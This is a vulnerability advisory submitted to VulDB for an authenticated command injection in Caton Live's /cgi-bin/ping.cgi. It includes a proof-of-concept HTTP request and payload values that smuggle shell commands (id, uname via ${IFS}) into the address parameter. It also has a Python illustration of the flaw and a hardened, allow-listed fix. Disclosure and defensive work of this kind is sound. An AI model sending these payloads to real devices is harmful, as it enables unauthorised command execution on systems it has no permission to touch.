| Title | Caton Live Unknown Version - Command Injection Authenticated |
|---|
| Description | # Date: 2023-04-26
# Exploit Author: Fabio C. Premoli and Claudio J. R. Ferreira
# Vendor Homepage: https://www.catontechnology.com/
# Software Link: https://www.catontechnology.com/en/products/video-processors/encoders-decoders/caton-live
# Version: unknown
# Tested on: Linux
Description:
A command injection vulnerability lets an attacker run arbitrary operating-system commands on the affected device because user-controlled input reaches a shell or command interpreter without validation or escaping. Once exploited, it gives the attacker code execution with the privileges of the process that spawned the shell, from which they can read configuration and credentials, pivot further into the network, deploy malware, or disrupt the device. Keeping systems patched and validating input against an allow-list are the main defences.
The vulnerability was found in the Caton Live web interface, which is served by Mini_HTTPD 1.27, in the diagnostic function that sends ICMP echo requests (ping) to a user-supplied IP address, implemented by /cgi-bin/ping.cgi. The address parameter is passed to the underlying ping command without sanitisation, so an authenticated user can append shell metacharacters to it and execute arbitrary commands, for example to open a reverse shell back to an attacker-controlled host.
Proof of Concept:
Request:
GET /cgi-bin/ping.cgi?address=localhost;id HTTP/1.1
Host: TARGET
Authorization: Basic <BASICTOKEN>
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
token: <AUTHTOKEN>
Referer: http://TARGET
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR, pt;q=0.9, en-US;q=0.8,en;q=0.7
Connection: close
Vulnerability Disclosure Schedule:
* November 2022: The vulnerability was found.
* January 11, 2023: An email was sent to support with a 3-month deadline for disclosure.
* April 26, 2023: I have not received any response from support.
Technical Details:
Version affected: Caton Live, version unknown (web server identifies itself as Mini_HTTPD 1.27)
Endpoint: /cgi-bin/ping.cgi
Parameter: address
Payload example: /cgi-bin/ping.cgi?address=;id;uname${IFS}-a (the shell expands ${IFS} to whitespace, so the payload carries no literal spaces and survives a filter or URL handling that would drop them)
Method: GET |
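The injection pattern the advisory describes, and the fix a developer would apply, as an added example that is not part of the original submission or of Caton's code. The Python below assumes ping.cgi interpolates the raw address parameter into a shell command line (the real CGI source is not on the page) and shows, on constructed query strings modelled on the PoC, how many commands the shell ends up running, why merely stripping whitespace does not help against ${IFS}, and an allow-listed, argv-based replacement that never invokes a shell. The function names (address_from_query, shell_view, safe_ping_argv) are illustrative.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus

# Constructed query strings modelled on the advisory's PoC; not captured traffic.
SAMPLE_QUERIES = {
    "benign": "address=localhost",
    "poc": "address=localhost;id",
    "ifs_bypass": "address=;id;uname${IFS}-a",
}


def address_from_query(query_string):
    """Return the 'address' parameter as a CGI would read it from QUERY_STRING.

    Splits only on '&' (older parse_qs versions also split on ';', which would
    hide the injection) and percent-decodes the value.
    """
    for pair in query_string.split("&"):
        name, _, value = pair.partition("=")
        if name == "address":
            return unquote_plus(value)
    return ""


def vulnerable_command(addr):
    """The pattern the advisory describes: the raw parameter glued into a
    command line that is then handed to /bin/sh -c. (Assumed behaviour of
    ping.cgi; the real CGI source is not on the page.)"""
    return "ping -c 1 " + addr


def strip_whitespace(addr):
    """A naive 'fix' that only removes whitespace. ${IFS} defeats it because
    the shell expands it to a space after this filter has already run."""
    return "".join(addr.split())


def shell_view(cmdline):
    """Approximate how /bin/sh would parse cmdline: expand ${IFS} to a space,
    split on ';' into simple commands, then word-split each one. Enough to show
    how many commands the injected line turns into; not a full shell parser."""
    expanded = cmdline.replace("${IFS}", " ")
    return [cmd.split() for cmd in expanded.split(";") if cmd.strip()]


# Allow-list for the hardened version: an IPv4/IPv6 literal or an RFC 1123 hostname.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def is_valid_target(addr):
    """Accept only values that cannot carry shell syntax or ping options."""
    try:
        ipaddress.ip_address(addr)
        return True
    except ValueError:
        return HOSTNAME_RE.match(addr) is not None


def safe_ping_argv(addr):
    """Hardened form: validate against the allow-list and build an argv list.
    No shell is involved, so metacharacters are inert, and '--' ends option
    parsing so a value such as '-f' cannot become a ping flag."""
    if not is_valid_target(addr):
        raise ValueError("rejected address: %r" % addr)
    return ["ping", "-c", "1", "--", addr]


def run_ping(addr, timeout=5):
    """Execute the hardened command without a shell; returns a CompletedProcess."""
    return subprocess.run(safe_ping_argv(addr), capture_output=True,
                          text=True, timeout=timeout)


if __name__ == "__main__":
    for label, query in SAMPLE_QUERIES.items():
        addr = address_from_query(query)
        cmds = shell_view(vulnerable_command(strip_whitespace(addr)))
        print("%-10s vulnerable path runs %d command(s): %s" % (label, len(cmds), cmds))
        try:
            print("%-10s hardened argv: %s" % (label, safe_ping_argv(addr)))
        except ValueError as exc:
            print("%-10s hardened path: %s" % (label, exc))
```

shell_view is deliberately minimal (it ignores pipes, quoting and backticks), which is enough to make the point: the "ifs_bypass" payload still becomes three commands after whitespace stripping, while the allow-list rejects every payload that contains anything other than an IP literal or hostname. The durable lesson is on the execution side, not the filtering side: pass the validated value as a single argv element and never through a shell.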
|---|
| Source | ⚠️ https://www.catontechnology.com/en/products/video-processors/encoders-decoders/caton-live |
|---|
| User | premoli (UID 45762) |
|---|
| Submission | 26/04/2023 16:23 (3 years ago) |
|---|
| Moderation | 12/05/2023 14:17 (16 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 228911 [Caton Live up to 2023-04-26 Mini_HTTPD /cgi-bin/ping.cgi address privilege escalation] |
|---|
| Points | 20 |
|---|